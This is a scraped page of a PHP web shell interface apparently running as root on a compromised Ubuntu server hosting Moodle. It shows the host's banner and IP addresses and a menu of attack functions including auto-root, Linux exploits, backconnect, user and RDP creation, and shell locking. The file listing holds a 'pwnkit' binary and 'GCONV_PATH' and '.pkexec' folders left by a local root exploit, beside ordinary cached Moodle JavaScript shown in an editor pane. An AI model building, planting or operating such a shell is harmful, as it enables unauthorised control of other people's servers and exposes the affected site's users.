Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
moodledata /
localcache /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
089b04fb8b9a8f11244a2f3b3b5fa5...
1.34
KB
-rw-rw-rw-
245afcf4cb87bb59420b2781c9fb93...
2.39
KB
-rw-rw-rw-
2da1ddb8ded251b3e8a343957aa49e...
20.86
KB
-rw-rw-rw-
44d88a236077299fe8209da44dc432...
87.38
KB
-rw-rw-rw-
589aa6e594f1a5445cf245c8c940f2...
17.09
KB
-rw-rw-rw-
683c4a4a12d6a11ea34088a1b30c5e...
2.64
KB
-rw-rw-rw-
850a2293145c3fa9d345bae4841591...
2.37
KB
-rw-rw-rw-
99a7a41c1a473e21021d832e3e5405...
17.32
KB
-rw-rw-rw-
c1f22793efcbe8e737090c163139e1...
97.01
KB
-rw-rw-rw-
c868d7f6990116df70c56a0b44ab80...
5.63
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 683c4a4a12d6a11ea34088a1b30c5eeeba0483ae
/** * JavaScript required by the question engine. * * @package moodlecore * @subpackage questionengine * @copyright 2008 The Open University * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ M.core_scroll_manager=M.core_scroll_manager||{};M.core_scroll_manager.save_scroll_pos=function(Y,element){if(typeof(element)=='string'){element=Y.one(document.getElementById(element))} var form=element.ancestor('form');if(!form){return} var scrollpos=form.one('input[name=scrollpos]');if(!scrollpos){scrollpos=form.appendChild(form.create('<input type="hidden" name="scrollpos" />'))} scrollpos.set('value',form.get('docScrollY'))} M.core_scroll_manager.save_scroll_action=function(e){var link=e.target.ancestor('a[href]');if(!link){M.core_scroll_manager.save_scroll_pos({},e.target);return} link.set('href',link.get('href')+'&scrollpos='+link.get('docScrollY'))} M.core_scroll_manager.scroll_to_saved_pos=function(Y){var matches=window.location.href.match(/^.*[?&]scrollpos=(\d*)(?:&|$|#).*$/,'$1');if(matches){window.scrollTo(0,matches[1]);Y.on('domready',function(){window.scrollTo(0,matches[1])});if(Y.one('body').hasClass('ie')){M.core_scroll_manager.force_ie_to_scroll(Y,matches[1])}}} M.core_scroll_manager.force_ie_to_scroll=function(Y,targetpos){var hackcount=25;function do_scroll(){window.scrollTo(0,targetpos);hackcount-=1;if(hackcount>0){setTimeout(do_scroll,10)}} Y.on('load',do_scroll,window)} M.core_question_engine=M.core_question_engine||{};M.core_question_engine.questionformalreadysubmitted=!1;M.core_question_engine.init_submit_button=function(Y,button,slot){var totalQuestionsInPage=document.querySelectorAll('div.que').length;var buttonel=document.getElementById(button);var outeruniqueid=buttonel.closest('.que').id;Y.on('click',function(e){M.core_scroll_manager.save_scroll_pos(Y,button);if(totalQuestionsInPage>1){buttonel.form.action=buttonel.form.action+'#'+outeruniqueid}},buttonel)} M.core_question_engine.init_form=function(Y,form){Y.one(form).setAttribute('autocomplete','off');Y.on('submit',M.core_question_engine.prevent_repeat_submission,form,form,Y);Y.on('key',function(e){if(!e.target.test('a')&&!e.target.test('input[type=submit]')&&!e.target.test('input[type=img]')&&!e.target.test('textarea')&&!e.target.test('[contenteditable=true]')){e.preventDefault()}},form,'press:13');Y.one(form).all('.questionflagsavebutton').remove();M.core_scroll_manager.scroll_to_saved_pos(Y)} M.core_question_engine.prevent_repeat_submission=function(e,Y){if(M.core_question_engine.questionformalreadysubmitted){e.halt();return} setTimeout(function(){Y.all('input[type=submit]').set('disabled',!0)},0);M.core_question_engine.questionformalreadysubmitted=!0}
Close